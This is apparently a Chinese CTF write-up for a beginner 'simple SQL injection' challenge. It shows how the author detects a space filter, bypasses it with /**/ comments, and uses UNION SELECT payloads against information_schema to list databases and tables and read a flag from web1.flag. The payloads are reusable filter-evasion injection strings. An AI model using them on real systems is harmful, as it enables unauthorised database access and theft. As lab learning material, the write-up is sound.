1. 程式人生 > >4.簡單的sql註入

4.簡單的sql註入

web安全 sql註入 ctf 實驗吧

根據頁面提示,到底過濾了什麽東西?可以知道一定過濾了什麽....

分別輸入1,2,3有對應的結果

技術分享

使用‘會報錯,於是

構造常用的sql語句:1‘ and ‘1‘=‘1

技術分享

沒有反應試一試1‘ and ‘1‘=‘2

技術分享

還是沒反應,工具提示,應該是過濾了什麽,改一下sql語句試一試

1and1=1

技術分享

可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

試一試1‘/**/and/**/‘1‘=‘1

發現有結果了:

於是構建sql語句:

判斷有那些數據庫:

1‘/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/‘1‘=‘1

可以看到結果:

技術分享

查看有哪些數據表:

1‘/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/‘1‘=‘1

技術分享

發現了flag的表,我們猜測應該是在web1數據庫中並且字段就是flag(其實就在本頁面的數據庫中)

故:

1‘/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/‘1‘=‘1

技術分享

本人也是初學者,參考了許多大佬的wp 自己寫出來後有什麽錯誤的地方,希望大家指出,謝謝!

本文出自 “11846238” 博客,請務必保留此出處http://11856238.blog.51cto.com/11846238/1947684

4.簡單的sql註入